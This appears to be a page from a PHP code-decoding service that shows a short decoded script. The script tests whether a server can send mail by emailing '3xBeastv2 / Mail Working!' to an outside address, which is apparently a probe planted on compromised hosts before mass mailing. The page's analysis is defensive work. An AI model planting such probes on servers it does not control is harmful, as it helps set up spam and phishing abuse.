Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if(function_exists("mail")) { mail('[email protected]', '3xBeastv2',..

Decoded Output download


			<?php
				if(function_exists("mail")) {
					mail('[email protected]', '3xBeastv2', 'Mail Working!');
					echo '1';
				} else {
					echo '0';
				}
			?>
		

Did this file decode correctly?

Original Code


			<?php
				if(function_exists("mail")) {
					mail('[email protected]', '3xBeastv2', 'Mail Working!');
					echo '1';
				} else {
					echo '0';
				}
			?>
		

Function Calls

mail 1
function_exists 1

Variables

None

Stats

MD5 961bcececbd48dfd8af813aa40313279
Eval Count 0
Decode Time 123 ms